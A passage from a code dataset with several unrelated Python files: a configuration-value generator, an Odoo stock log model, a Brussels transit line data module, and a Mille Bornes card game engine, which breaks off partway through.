l2]\n\ndef genStringList(param):\n vals = param.dvalue.split(\",\") # /, ;\n assert len(vals) >= 2\n return [vals[0], vals[1]]\n\ndef genFloat(param):\n s = param.dvalue\n m = re.match(r\"^\\d+\\.\\d+[fF]$\", s)\n if m:\n s = s[:-1]\n val = float(s)\n if val == 0.0:\n return [1.0, -1.0]\n else:\n return [val/2, val*2]\n\ndef genPort(param):\n return config.PORTS\n\ndef genIPPort(param):\n s = param.dvalue\n s = s[:s.find(\":\")]\n return [s + \":\" + str(config.PORTS[0]), s + \":\" + str(config.PORTS[1])]\n\ndef genIP(param):\n return config.IPS\n\ndef genFilePath(param):\n return config.FILEPATHS\n\ndef genDirPath(param):\n return config.DIRPATHS\n\ndef genTime(param):\n s = param.dvalue\n for unit in timeunits:\n if s.endswith(unit):\n t = s[:s.find(unit)]\n if isInt(t):\n t = int(t)\n if t == 0:\n return [\"1\" + unit, \"2\" + unit]\n elif t == 1:\n return [\"10\" + unit, \"2\" + unit]\n return [\"1\" + unit, str(2*t) + unit]\n\ndef genData(param):\n s = param.dvalue\n for unit in datasize:\n if s.endswith(unit):\n t = s[:s.find(unit)]\n if isInt(t):\n t = int(t)\n if t == 0:\n return [\"1\" + unit, \"2\" + unit]\n elif t == 1:\n return [\"10\" + unit, \"2\" + unit]\n return [\"1\" + unit, str(2*t) + unit]\n\ndef genUser(param):\n return config.USERS\n\ndef genGroup(param):\n return config.GROUPS\n\ndef genNameservices(param):\n return config.NAMESERVICES\n\ndef genInterface(param):\n return config.INTERFACES\n\ndef genAlgorithm(param):\n return semanticExtractionNoType(param)\n\ndef genPotentialFloat(param):\n return [0.1, 0.5]\n\ndef semanticExtractionClassName(param):\n # strategies\n # replace \"/\" in semantics with \" \"\n semantics = param.description + \" \"\n # extract words after key phrases from semantics\n arrs = [[], [], []]\n for phrase in config.key_phrases_plural:\n if phrase in semantics:\n parts = semantics.split(phrase)\n raw = parts[1].split(\".\")[0]\n raw = raw.replace(\",\", \" \")\n raw = raw.replace(\" and \", \" \")\n raw = raw.replace(\" or \", \" \")\n raw = raw.strip()\n arrs[0] = raw.split()\n break\n for phrase in config.key_phrases_singular:\n if phrase in semantics:\n parts = semantics.split(phrase)\n tmp = parts[1].split(\".\")[0]\n tmp = tmp.strip()\n arrs[1] = [tmp]\n break\n # select ,from arr1, arr2 the one containing least non word characters\n # break tie by selecting the one with more values other than SKIP\n nonword = re.compile('\\W')\n selected = 0\n mincnt = sys.maxsize\n for idx, arr in enumerate(arrs):\n match = nonword.findall(\"\".join(arr))\n match = [x != \",\" for x in match]\n if mincnt > len(match):\n selected = idx\n mincnt = len(match)\n elif mincnt == len(match):\n if len(arrs[selected]) < len(arr):\n selected = idx\n arr = []\n hasCapital = False\n for char in param.dvalue:\n if char.isupper():\n hasCapital = True\n break\n for word in arrs[selected]:\n if word == param.dvalue:\n continue\n elif hasCapital:\n for char in word:\n if char.isupper():\n arr.append(word)\n break\n if len(arr) != 0:\n return arr[0:2]\n return []\n\ndef semanticExtractionNoType(param):\n # strategies\n # replace \"/\" in semantics with \" \"\n semantics = param.description + \" \"\n arrs = [[], [], []]\n for phrase in config.key_phrases_plural:\n if phrase in semantics:\n parts = semantics.split(phrase)\n raw = parts[1].split(\".\")[0]\n \n if \".\" not in parts[1] and len(parts) == 2:\n raw = parts[1]\n raw = raw.replace(\",\", \" \")\n raw = raw.replace(\":\", \" \")\n raw = raw.replace(\" and \", \" \")\n raw = raw.replace(\" or \", \" \")\n raw = raw.strip()\n arrs[0] = raw.split()\n break\n for phrase in config.key_phrases_singular:\n if phrase in semantics:\n parts = semantics.split(phrase)\n tmp = parts[1].split(\".\")[0]\n tmp = tmp.strip()\n arrs[1] = [tmp]\n break\n # select ,from arr1, arr2 the one containing least non word characters\n # break tie by selecting the one with more values other than SKIP\n nonword = re.compile('\\W')\n selected = 0\n mincnt = sys.maxsize\n for idx, arr in enumerate(arrs):\n match = nonword.findall(\"\".join(arr))\n match = [x != \",\" for x in match]\n if mincnt > len(match):\n selected = idx\n mincnt = len(match)\n elif mincnt == len(match):\n if len(arrs[selected]) < len(arr):\n selected = idx\n arr = []\n hasCapital = False\n for char in param.dvalue:\n if char.isupper():\n hasCapital = True\n break\n for word in arrs[selected]:\n if word == param.dvalue:\n continue\n elif hasCapital:\n for char in word:\n if char.isupper():\n arr.append(word)\n break\n else:\n allLower = True\n for char in word:\n if not char.islower():\n allLower = False\n if allLower:\n arr.append(word)\n if len(arr) != 0:\n return arr[0:2]\n # map out all capital words\n tmpWord = \"\"\n skipChars = []\n specialChars = []\n arr = []\n for char in param.dvalue:\n if char not in ALPHABETS:\n skipChars.append(char)\n for char in semantics:\n if char.isupper() or char in skipChars:\n tmpWord += char\n elif char != \" \" and char not in ALPHABETS:\n tmpWord += char\n specialChars.append(char)\n elif len(tmpWord) > 2:\n if tmpWord[0] not in ALPHABETS:\n tmpWord = tmpWord[1:]\n if tmpWord[-1] not in ALPHABETS:\n tmpWord = tmpWord[0:-1]\n if tmpWord != param.dvalue:\n for schar in specialChars:\n if schar in tmpWord:\n tmpWord = \"\"\n if tmpWord != \"\":\n arr.append(tmpWord)\n tmpWord = \"\"\n else:\n tmpWord = \"\"\n \n capcnt = 0\n for char in param.dvalue:\n if char.isupper() or char in skipChars:\n capcnt += 1\n if capcnt != len(param.dvalue) or capcnt == 0:\n arr = []\n if len(arr) != 0:\n return arr[0:2]\n return []\n\ndef genClassName(param):\n return semanticExtractionClassName(param)\n\ndef genNoType(param):\n return semanticExtractionNoType(param)\n\n# for zk only\n\ndef isZKDirPath(name):\n return name.endswith(\"Dir\")\n\ndef isZKLimit(name):\n return name.endswith(\"Limit\")\n\ndef isZKPort(name):\n return name.endswith(\"Port\")\n\ndef isZKPortAddress(name):\n return name.endswith(\"PortAddress\")\n\ndef isZKSize(name):\n return name.endswith(\"size\")\n\ndef genZKDir(param):\n return config.DIRPATHS\n\ndef genZKPort(param):\n return config.PORTS\n\ndef genZKPortAddress(param):\n return config.ZKPORTADDRS\n\ndef genZKLimit(param):\n return config.ZKLIMIT\n\ndef genZKSize(param):\n return config.ZKSIZE\n","repo_name":"xlab-uiuc/openctest","sub_path":"core/generate_value/gutil.py","file_name":"gutil.py","file_ext":"py","file_size_in_byte":12730,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"12142110548","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import ValidationError, UserError\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import datetime, date\n\n\n\nclass IndentLedger(models.Model):\n _name = 'stock.log.book'\n _description = \"Issue Request\"\n\n employee_id = fields.Many2one('hr.employee', string='Requested/Received By')\n branch_id = fields.Many2one('res.branch', string='Branch', store=True)\n Indent_id = fields.Many2one('indent.request', string='Indent/GRN')\n Indent_item_id = fields.Many2one('indent.request.items', string='Indent Item')\n item_category_id = fields.Many2one('indent.stock', string='Item Category')\n item_id = fields.Many2one('child.indent.stock', string='Item')\n specification = fields.Text('Specifications')\n serial_bool = fields.Boolean(string='Serial Number')\n serial_number = fields.Char(string='Serial Number')\n requested_quantity = fields.Integer('Requested Quantity')\n approved_quantity = fields.Integer('Approved Quantity')\n requested_date = fields.Date('Requested Date')\n approved_date = fields.Date('Approved Date', default=fields.Date.today())\n opening = fields.Integer('Opening')\n quantity = fields.Integer('Quantity')\n balance = fields.Integer('Balance')\n\n\n indent_type = fields.Selection([('issue', 'Issue'), ('grn', 'GRN')\n ],track_visibility='always', string='Type')\n","repo_name":"gotorishab/stpi","sub_path":"indent_stpi/models/stock_log_book.py","file_name":"stock_log_book.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21364918116","text":"from csv import reader\nfrom io import BytesIO\nfrom dataclasses import dataclass, field\nfrom enum import Enum\nfrom typing import List, Optional\n\nfrom dataclasses_json import LetterCase, dataclass_json\n\nfrom .passing_times import Destination\n\nNOT_FOUND = \"NOT FOUND\"\n\n\nclass RouteType(Enum):\n \"\"\"STIB network route type enumeration.\"\"\"\n\n TRAM = 0\n METRO = 1\n BUS = 3\n\n\n@dataclass_json(letter_case=LetterCase.CAMEL)\n@dataclass\nclass LinePoint:\n \"\"\"Dataclass for a stop/point of a STIB line.\"\"\"\n\n id: str = \"\"\n order: int = 0\n stop_name: str = \"\"\n stop_name_fr: str = \"\"\n stop_name_nl: str = \"\"\n\n def set_stop_names(self, stops_csv_file: BytesIO, translations_csv_file: BytesIO):\n \"\"\"Extract stop name and translations from csv files.\"\"\"\n\n self.stop_name = self._set_generic_stop_name(stops_csv_file)\n self.stop_name_fr = self._set_stop_name_translation(\"fr\", translations_csv_file)\n self.stop_name_nl = self._set_stop_name_translation(\"nl\", translations_csv_file)\n\n def _set_generic_stop_name(self, stops_csv_file: BytesIO) -> str:\n \"\"\"Extract generic stop name from csv translations file.\"\"\"\n\n csv_reader = reader(stops_csv_file.getvalue().decode(\"utf-8\").splitlines())\n for stop_info in csv_reader:\n if stop_info[0] == self.id:\n return stop_info[2]\n return NOT_FOUND\n\n def _set_stop_name_translation(\n self, language: str, translations_csv_file: BytesIO\n ) -> str:\n \"\"\"Extract stop name translation from csv translations file.\"\"\"\n\n csv_reader = reader(\n translations_csv_file.getvalue().decode(\"utf-8\").splitlines()\n )\n for translation_info in csv_reader:\n if (\n translation_info[0] == self.stop_name\n and translation_info[2] == language\n ):\n return translation_info[1]\n return NOT_FOUND\n\n\n@dataclass_json(letter_case=LetterCase.CAMEL)\n@dataclass\nclass LineDetails:\n \"\"\"Dataclass for details of a STIB line.\"\"\"\n\n destination: Optional[Destination] = None\n direction: str = \"\"\n line_id: str = \"\"\n points: List[LinePoint] = field(default_factory=list)\n route_type: Optional[RouteType] = None\n\n def set_route_type(self, routes_csv_file: BytesIO):\n \"\"\"Extract route type from csv routes file.\"\"\"\n\n csv_reader = reader(routes_csv_file.getvalue().decode(\"utf-8\").splitlines())\n for route_info in csv_reader:\n if route_info[1] == self.line_id:\n self.route_type = RouteType(int(route_info[4]))\n\n # Hardcode the route type if not defined... need to change this later\n if not self.route_type:\n self.route_type = RouteType(1)\n","repo_name":"Antoninj/stib-alexa-skill","sub_path":"lambda/custom/core/service/model/line_stops.py","file_name":"line_stops.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"75051733031","text":"import random # Shuffle (Deck - cards)\n\n# --------------------\n# Helper functions\n\ndef card_matrix_build():\n \"\"\"\n Return list of unique card types\n \n Structure: [[Card Type, Card Value],]\n \n Index is used in defining game state\n \"\"\"\n return [['Distance', 25], ['Distance', 50], ['Distance', 75], ['Distance', 100], ['Distance', 200], \n ['Remedy', 'Gasoline'], ['Remedy', 'Spare Tire'], ['Remedy', 'Repairs'], ['Remedy', 'End of Limit'], ['Remedy', 'Roll'], \n ['Safety', 'Extra Tank'], ['Safety', 'Puncture-Proof'], ['Safety', 'Driving Ace'], ['Safety', 'Right-of-Way'], \n ['Hazard', 'Out of Gas'], ['Hazard', 'Flat Tire'], ['Hazard', 'Accident'], ['Hazard', 'Speed Limit'], ['Hazard', 'Stop']\n ]\n\ndef action_matrix_build(card_matrix):\n \"\"\"\n card_matrix (list) - list of unique card options\n \n Return list of all possible actions\n \n List Structure: \n Indicies: 0 - 75 (76 actions) - normal play of cards (discard or on a team's pile)\n [[Team index | -1 (Discard), Card Type, Card Value],]\n e.g. [[-1, 'Distance', 25], [-1, 'Distance', 50], ...]\n Indicies: 76 - 90 (15 actions) - coup fourre options\n [[Team index, 'Coup Fourre', Card Value | 'Do not play'],]\n e.g. [[0, 'Coup Fourre', 'Extra Tank'], [0, 'Coup Fourre', 'Puncture-Proof'], ...]\n Indicies: 91 - 96 (6 actions) - extension options\n [[Team index, 'Extension', Yes | No],]\n e.g. [[0, 'Extension', 'Yes'], [0, 'Extension', 'No'], [1, 'Extension', 'Yes'], ...]\n \n \"\"\"\n \n action_list = []\n \n # Indicies: 0 - 75 - normal play of cards in either discard (team_option[0] = -1) or on a team's piles\n team_options = [-1, 0, 1, 2]\n \n for t in team_options:\n for c in card_matrix:\n action_list.append([t, c[0], c[1]])\n \n # Add coup fourre options\n team_options = [0, 1, 2]\n card_options = ['Extra Tank', 'Puncture-Proof', 'Driving Ace', 'Right-of-Way', 'Do not play']\n \n for t in team_options:\n for c in card_options:\n action_list.append([t, 'Coup Fourre', c])\n \n # Add extension options\n team_options = [0, 1, 2]\n card_options = ['Yes', 'No']\n \n for t in team_options:\n for c in card_options:\n action_list.append([t, 'Extension', c])\n \n return action_list\n\ndef safety_counter(hazard_value):\n \"\"\"\n Return the Safety Card Value that counters the given hazard\n \"\"\"\n \n safety_choices = ['Extra Tank', 'Puncture-Proof', 'Driving Ace', 'Right-of-Way', 'Right-of-Way']\n hazard_index = ['Out of Gas', 'Flat Tire', 'Accident', 'Speed Limit', 'Stop'].index(hazard_value)\n return safety_choices[hazard_index]\n\ndef actions_space(state, card_matrix, action_matrix):\n \"\"\"\n Return all available actions given the current game state\n \n state ([int]) - current game state\n card_matrix (list) - lookup card info by index\n action_matrix (list) - lookup action info by index\n \n Return ([int]) - action indicies\n \"\"\"\n \n # Break state list into variables for easier legibility of code\n number_of_players = state[0]\n play_status = state[1]\n extension_team = state[2]\n team_current_index = state[3]\n last_action_index = state[5]\n team_status = [] #2D shape ( 2 or 3 rows (teams), 8 (see below) (speed status, battle status, distance points, 200's played) )\n # team status index: 0 = Speed Status; 1 = Battle Status; 2 = Distance points; 3 = 200's played\n # 4 = Extra Tank; 5 = Puncture Proof; 6 = Driving Ace; 7 = Right-of-Way\n team_status.append(state[16:24]) # Team 1 (0 index)\n team_status.append(state[24:32]) # Team 2\n if state[32] > -1:\n team_status.append(state[32:40]) # Team 3\n player_hand = [Card(card_matrix[c][0], card_matrix[c][1]) for c in state[40:47] if c > -1]\n \n # Variable to hold valid actions - use set to prevent duplicate action potentials (e.g. player has 2 cards of the same value)\n player_actions = set()\n \n if play_status == 0 or play_status == 3:\n # Normal game play\n\n for card in player_hand:\n\n # Play options - cards that can be played on the \"table\" (not discarded)\n if card.type == \"Safety\":\n # Safeties can be played on own team at any point\n player_actions.add(action_matrix.index([team_current_index, card.type, card.value]))\n elif card.type == \"Distance\":\n # Distance can be played on own team:\n # Team cannot exceed 1,000 distance points (or 700 if Extension has not yet been called for 2, 3, or 6 player games)\n # Top card in Battle Pile is Roll OR Right-of-Way Safety has been played and no other Hazard card is top of battle pile\n # Distance = 200 - Team cannot play more than 2 200 distance cards\n # Distance > 50 = Top card in Speed Pile is End of Limit or null OR Right-of-Way Safety has been played\n\n # Team will not exceed 700/1,000 if played\n if (number_of_players == 4):\n max_points = 1000\n else:\n max_points = 700 if extension_team == -1 else 1000\n\n if (team_status[team_current_index][2] + card.value) <= max_points:\n\n if team_status[team_current_index][1] == 4:\n # Battle Status: Team can go\n\n if card.value <= 50:\n # Status of Speed Pile is irrelevant\n player_actions.add(action_matrix.index([team_current_index, card.type, card.value]))\n else:\n if team_status[team_current_index][0] == 0:\n # No speed limit, ensure distance of 200 can be played\n if card.value < 200 or team_status[team_current_index][3] < 2:\n player_actions.add(action_matrix.index([team_current_index, card.type, card.value]))\n\n elif card.type == \"Remedy\":\n # Remedies can be played on own team to counter a hazard unless own team has appropriate safety already played\n\n if card.value == \"Roll\" and team_status[team_current_index][1] == 3:\n player_actions.add(action_matrix.index([team_current_index, card.type, card.value])) \n elif card.value == \"End of Limit\":\n # Speed Pile\n if team_status[team_current_index][0] == 1:\n player_actions.add(action_matrix.index([team_current_index, card.type, card.value]))\n \n # Battle Pile\n elif card.value == 'Gasoline' and team_status[team_current_index][1] == 0:\n player_actions.add(action_matrix.index([team_current_index, card.type, card.value]))\n elif card.value == 'Spare Tire' and team_status[team_current_index][1] == 1:\n player_actions.add(action_matrix.index([team_current_index, card.type, card.value]))\n elif card.value == 'Repairs' and team_status[team_current_index][1] == 2:\n player_actions.add(action_matrix.index([team_current_index, card.type, card.value]))\n\n else:\n # Card Type: Hazard - can only be played on oponents\n\n # Can always play on oponents unless they have a safety in place (can be played on top of other hazards)\n safety_value = safety_counter(card.value)\n safety_index = [\"Extra Tank\", \"Puncture-Proof\", \"Driving Ace\", \"Right-of-Way\"].index(safety_value) + 4\n\n for i in range(len(team_status)):\n if i == team_current_index:\n continue\n\n if team_status[i][safety_index] == 0:\n player_actions.add(action_matrix.index([i, card.type, card.value]))\n\n # Discard - all cards can be discarded\n player_actions.add(action_matrix.index([-1, card.type, card.value]))\n\n elif play_status == 1:\n # Coup Fourre Check (hazard played) - Evaluate possible actions\n hazard_value = action_matrix[last_action_index][2]\n safety_value = safety_counter(hazard_value)\n has_safety = False\n \n for card in player_hand:\n if card.type == \"Safety\" and card.value == safety_value:\n has_safety = True\n \n if has_safety == True:\n # Player has the safety, give them the option to play it or not\n player_actions.add(action_matrix.index([team_current_index, \"Coup Fourre\", safety_value]))\n player_actions.add(action_matrix.index([team_current_index, \"Coup Fourre\", \"Do not play\"]))\n\n # (else:) Player does not have safety, start the next player's turn (return an empty list)\n\n elif play_status == 2:\n # Extension Check - Current player reached 700 points, provide options to go into Extended play\n player_actions.add(action_matrix.index([team_current_index, \"Extension\", \"Yes\"]))\n player_actions.add(action_matrix.index([team_current_index, \"Extension\", \"No\"]))\n\n # Convert player actions to a list (Set cannot be used with certain functions like random.choice)\n return list(player_actions)\n\n# --------------------\n# Card\nclass Card():\n \"\"\"\n Representation of a single card in the deck\n \"\"\"\n \n def __init__ (self, card_type, card_value):\n # Type: Hazard, Remedy, Safety, Distance\n self.type = card_type\n # Value: Either the name of the card or point value\n self.value = card_value\n \n# --------------------\n# Deck\nclass Deck():\n \"\"\"\n Represents the full deck of cards\n \n Attributes\n cards ([Card]) - all cards not yet in play (i.e. face-down deck on the table)\n cards_discard ([Card]) - cards that have been discarded\n \n Expected Card Counts:\n 106 - full deck for 4 or 6 players\n 46 - distance\n 38 - remedy\n 4 - safety\n 18 - hazard\n 101 - full deck for 2 or 3 players\n 13 - hazard (1 of each type removed)\n Start of game, after dealing 6 cards:\n 2 players - 89\n 3 players - 83\n 4 players - 82\n 6 players - 70\n \"\"\"\n \n def __init__ (self, card_matrix, players_count):\n \"\"\"\n card_matrix (int) - reference of unique cards in the deck\n players_count (int) - number of game players\n \"\"\"\n \n # All cards not yet in play (i.e. the deck, face-down on the table)\n self.cards = []\n \n # Cards which have been discarded and may no longer be played\n self.cards_discard = []\n \n # Setup the playable deck\n self.build(card_matrix, players_count)\n \n # Shuffle the deck\n random.shuffle(self.cards)\n \n def build(self, card_matrix, players_count):\n # Initialize the cards in the deck (assumes the deck has been cleared)\n num_of_cards = [10, 10, 10, 12, 4, 6, 6, 6, 6, 14, 1, 1, 1, 1]\n \n if players_count < 4:\n num_of_cards.extend([2, 2, 2, 3, 4])\n else:\n num_of_cards.extend([3, 3, 3, 4, 5])\n \n for i in range(len(card_matrix)):\n self.cards += num_of_cards[i] * [Card(card_matrix[i][0], card_matrix[i][1])]\n \n def draw(self):\n return self.cards.pop()\n \n# --------------------\n# Team\nclass Team():\n \"\"\"\n A team can have:\n 1 player - games with 2 or 3 total players\n 2 players - games with 4 or 6 total players\n \n Attributes:\n \n General\n name (str) - team name (e.g. \"Team 1\")\n \n Card lists: full history of cards played\n safety_area ([Card]) - safety cards played (including coup fourre)\n speed_pile ([Card]) - speed limit and end-of-limit hazard cards played\n battle_pile ([Card]) - hazards, remedies, and go cards\n distance_pile ([Card]) - distance cards played\n \n State: current state of the team (these are applied after all logic - e.g. Flat Tire may be last battle_pile card but with a safety the status may indicate otherwise)\n safety_played ([str]) - card value of any safeties played (convenience function to easily identify safety cards)\n speed_status (int) - 0 = No speed limit; 1 = Speed limit\n battle_status (int) - 0 = Out of Gas; 1 = Flat Tire; 2 = Accident; 3 = Stop; 4 = Go\n distance_points (int) - total distance traveled by the team\n distance_200 (int) - number of 200 Distance cards played (max 2 per team)\n \"\"\"\n \n def __init__ (self, team_number):\n self.name = \"Team {0}\".format(team_number)\n self.safety_pile = []\n self.speed_pile = []\n self.battle_pile = []\n self.distance_pile = []\n self.safety_played = []\n self.speed_status = 0\n self.battle_status = 3\n self.distance_points = 0\n self.distance_200 = 0\n \n# --------------------\n# Player\nclass Player():\n \"\"\"\n A player (AI or human)\n \n Attributes:\n name (str) - name of the player\n team (Team) - team the player is on (to share played cards)\n hand ([Card]) - cards the player is holding\n \"\"\"\n \n def __init__ (self, name, team):\n self.name = name\n self.team = team\n self.hand = []\n \n \n def draw(self, deck):\n \"\"\"\n Draw a card if there are cards remaining\n \"\"\"\n \n if len(deck.cards) > 0:\n self.hand.append(deck.draw())\n \n def find_card(self, card_type, card_value):\n \"\"\"\n Return (Card) the first card matching the card type and value (returns None if no matching card - should be impossible and represents programmatic error)\n \"\"\"\n \n for i in range(len(self.hand)):\n if self.hand[i].type == card_type and self.hand[i].value == card_value:\n return self.hand.pop(i)\n \n return None\n \n def reward_last_action(self, action_history):\n \"\"\"\n Return the reward for the last action taken by the player\n If player has not yet taken an action, 0 is returned\n \"\"\"\n # Start from the end of the Action History and add/subtract rewards until first occurrance of current player\n total_reward = 0\n last_action_found = False\n for act in reversed(action_history):\n if act[0] == self:\n total_reward += act[3]\n last_action_found = True\n break\n else:\n if act[0].team == self.team:\n total_reward += act[3]\n else:\n total_reward -= act[3]\n \n return total_reward if last_action_found else 0\n \n# --------------------\n# Game\nclass Game():\n \"\"\"\n A single game\n Technically a \"hand\", represents cards shuffled and play until a team reaches 1,000 distance points or no further action can be taken by any player\n Players:\n 2 or 3 - each player is independent (team = player)\n 4 or 6 - players in pairs on teams\n The order the players are passed determines:\n Order of play\n Team members:\n 4 - a & c; b & d\n 6 - a & d; b & e; c & f\n \n Class Variables:\n card_matrix (list) - list of unique cards in the deck\n \n action_matrix (list) - list of all potential actions for the game (97 possible actions: index 0 - 96)\n \n Attributes:\n teams ([Team]) - list of teams\n \n players ([Player]) - list of players in game play order\n \n player_current (Player) - the current player (set by start_turn)\n \n play_status (int) - indicates current status of play - used to control game flow, values:\n 0 = Normal (play advances to next player)\n 1 = Coup Fourre Check (hazard has been played, provide team players opportunity to call Coup Fourre)\n 2 = Extension Check (Current player reached 700, next action to determine if they wish to call for an Extension)\n 3 = Safety Bonus Turn (Current player played a Safety, next action to provide an additional bonus turn)\n 4 = Game Over\n \n Coup Fourre Check Handling - used when a hazard is played against a team, to check if the team wishes to call coup fourre (if possible)\n coup_fourre_player (Player|None) - player who played the hazard card (started the coup fourre check)\n coup_fourre_team (Team|None) - team who had the hazard played against (these players are checked for coup fourre status)\n coup_fourre_hazard (str) - card value of the hazard played against the team (e.g. \"Out of Gas\", \"Stop\", \"Speed Limit\", etc.)\n \n deck (Deck) - deck of cards\n deck.cards ([Card]) - cards not yet drawn (\"face-down on table\")\n deck.cards_discard ([Card]) - cards discarded by players (\"face-up, out-of-play\")\n \n player_actions ([int]) - index list of actions the current player can take\n \n player_state ([int]) - list of current state of game for the current player\n \n action_history ([[Player, [int], int, int]]) - history/log of all actions taken in the game in order they were played, each list element contains:\n Player - the Player who took the action\n State - the state of the game when the player selected the action\n Action Index - the index of the actions class variable that was taken\n Reward - point value reward from the action (Distance card, Safety, Coup Fourre, playing all 4 safeties, etc.)\n \n extension_team (Team|None) - (2, 3, or 6 players) None = extended play has not been called; Team = the team who reached 700 and called for Extension\n \n Methods:\n __init__ - creates a new Game object, initalizes all variables, deals 6 cards to each player, starts first player (calls start_turn)\n player_names ([str]) - list of strings, names of the players (in game play and team selection order)\n \n start_turn - sets current player based on play status, draws a card (if applicable), determines allowed actions for the current player\n Note: this method is called internally, there should not be a need during normal game play to call this method explicitly\n \n play_action - (\"Step\") executes the desired action for the current player, sets game variables, starts next player's turn (calls start_turn) if applicable\n action_index (int) - the index of the action to be played\n \n final_team_points - Return a list of final points by team in team order\n Return ([int])\n \n state - Return the state for the current player\n Return ([int])\n \"\"\"\n \n # Class variables\n card_matrix = card_matrix_build()\n action_matrix = action_matrix_build(card_matrix)\n \n def __init__ (self, player_names):\n players_count = len(player_names)\n \n # Setup the players\n if players_count < 4:\n self.teams = []\n self.players = []\n for i in range(players_count):\n self.teams.append(Team(i + 1))\n self.players.append(Player(player_names[i], self.teams[i]))\n self.teams[i].name = f\"Team {i + 1} ({player_names[i]})\"\n else:\n teams_count = players_count // 2\n self.teams = [Team(i + 1) for i in range(teams_count)]\n self.players = [Player(player_names[i], self.teams[i % teams_count]) for i in range(players_count)]\n for i in range(teams_count):\n self.teams[i].name = \"Team {0} ({1})\".format(i + 1, ', '.join(player_names[i::teams_count]))\n \n # Setup the playing deck\n self.deck = Deck(self.card_matrix, players_count)\n \n # Deal 6 cards to each player (1 card at a time to each player)\n for i in range(6):\n for p in self.players:\n p.draw(self.deck)\n \n # Initalize current player\n self.player_current = self.players[-1]\n self.play_status = 0\n \n # Initalize Coup Fourre Check Handling\n self.coup_fourre_player = None\n self.coup_fourre_team = None\n self.coup_fourre_hazard = None\n \n # Initalize player actions (int list corresponding to the index for the actions class variable)\n self.player_actions = []\n self.player_state = []\n self.action_history = []\n \n # Extension variables\n self.extension_check = False\n self.extension_team = None\n \n # Start first player's turn\n self.start_turn()\n \n def start_turn(self):\n \"\"\"\n Begin the next player's turn\n \n Play Status:\n 0 Normal - normal game play, play advances to the next player, that player draws a card and available actions are evaluated\n 1 Coup Fourre Check - a hazard has been played, players are evaluated and given opportunity to play counter safety\n 2 Extension Check - 2, 3, or 6 players; player reached 700 points, available actions consistent of Yes/No of an Extension\n 3 Safety Bonus Turn - current player played a safety and gets a bonus turn\n \"\"\"\n \n # Setup current player\n if self.play_status == 0:\n # Normal game play - advance to next player\n \n if len(self.deck.cards) > 0:\n player_current_index = self.players.index(self.player_current)\n player_next_index = player_current_index + 1 if player_current_index < len(self.players) - 1 else 0\n self.player_current = self.players[player_next_index]\n self.player_current.draw(self.deck)\n \n else:\n # No cards left in the deck, advance to the next player with cards remaining in their hand\n player_index = self.players.index(self.player_current)\n player_next_index = -1\n \n while player_next_index == -1:\n player_index = player_index + 1 if player_index < len(self.players) - 1 else 0\n if len(self.players[player_index].hand) > 0:\n player_next_index = player_index\n \n self.player_current = self.players[player_next_index]\n \n elif self.play_status == 1:\n # Coup Fourre Check - Hazard has been played\n player_index = self.players.index(self.player_current)\n player_next_index = -1\n\n while player_next_index == -1:\n player_index = player_index + 1 if player_index < len(self.players) - 1 else 0\n\n if self.players[player_index].team == self.coup_fourre_team:\n # Found next player on the team\n player_next_index = player_index\n self.player_current = self.players[player_next_index]\n \n # Evaluating action will determine if this player has the safety (this will take care of instance where person has no cards as well)\n \n elif self.players[player_index] == self.coup_fourre_player:\n # This is the player that played the hazard to begin with\n \n # Turn off the coup fourre check variables to exit the coup fourre check (return to normal play)\n self.play_status = 0\n self.coup_fourre_player = None\n self.coup_fourre_team = None\n self.coup_fourre_hazard = None\n \n # Play returns to next player with cards in their hand\n while player_next_index == -1:\n player_index = player_index + 1 if player_index < len(self.players) - 1 else 0\n if len(self.players[player_index].hand) > 0:\n player_next_index = player_index\n \n self.player_current = self.players[player_next_index]\n \n # Draw to start new turn (normal play)\n self.player_current.draw(self.deck)\n \n elif self.play_status == 3:\n # Extra turn - set to current player unless they do not have any cards (then next player with cards)\n player_index = self.players.index(self.player_current)\n player_next_index = -1\n \n while player_next_index == -1:\n if len(self.players[player_index].hand) > 0:\n player_next_index = player_index\n else:\n player_index = player_index + 1 if player_index < len(self.players) - 1 else 0\n \n self.player_current = self.players[player_next_index]\n self.player_current.draw(self.deck)\n \n # Note: Extension Check and Safety Bonus Turn - current player does not change\n \n # State-Action space: populate current game state and possible actions\n self.player_state = self.state()\n self.player_actions = actions_space(self.player_state, self.card_matrix, self.action_matrix)\n \n # If the game state was a 2 (Extension check) or 3 (extra turn), set game play status to 0 (normal) as the next action will resolve these\n if self.play_status == 2 or self.play_status == 3:\n self.play_status = 0\n \n if len(self.player_actions) == 0:\n # No actions possible for current player, start next player's turn\n self.start_turn()\n \n def play_action(self, action_index):\n \"\"\"\n Plays selected action and ends the player's turn\n \"\"\"\n \n # Retrieve information about the action to take\n action = self.action_matrix[action_index]\n if action[1] == \"Coup Fourre\":\n played_card = None if action[2] == \"Do not play\" else self.player_current.find_card(\"Safety\", action[2])\n elif action[1] == \"Extension\":\n played_card = None\n else:\n played_card = self.player_current.find_card(action[1], action[2])\n \n # Action history\n # Initalize reward to 0\n # This implementation allows for:\n # Adding additional history entries where Extension is achieved by non-calling team\n # Reference to current play is not altered and represents the true current player\n action_history_add = [[self.player_current, self.player_state, action_index, 0]]\n \n if action[0] == -1:\n # Discard the selected card\n self.deck.cards_discard.append(played_card)\n \n elif action[1] == \"Distance\":\n # Add card to team's Distance Pile\n self.player_current.team.distance_pile.append(played_card)\n \n # Increment team's distance points\n self.player_current.team.distance_points += action[2]\n \n # If 200, increment team's 200 card counter\n if action[2] == 200:\n self.player_current.team.distance_200 += 1\n \n # Increment action reward for point value\n action_history_add[0][3] += action[2]\n \n # Check End of Game and Extension\n team_points = self.player_current.team.distance_points\n \n if len(self.players) != 4:\n # Extension play possible\n \n if self.extension_team is None and team_points == 700:\n # Player can call Extension if desired (change play status for next setup)\n self.play_status = 2\n elif self.extension_team is not None and team_points == 1000:\n # End Game: Player has reached Extension\n \n # Add reward points for: trip completed (400)\n action_history_add[0][3] += 400\n \n # Add reward points for extension\n action_history_add[0][3] += 200\n \n # If player's team is not the team that called the extension, give 200 points to other team (if applicable) as well\n if self.extension_team != self.player_current.team:\n for t in self.teams:\n if t != self.player_current.team and t != 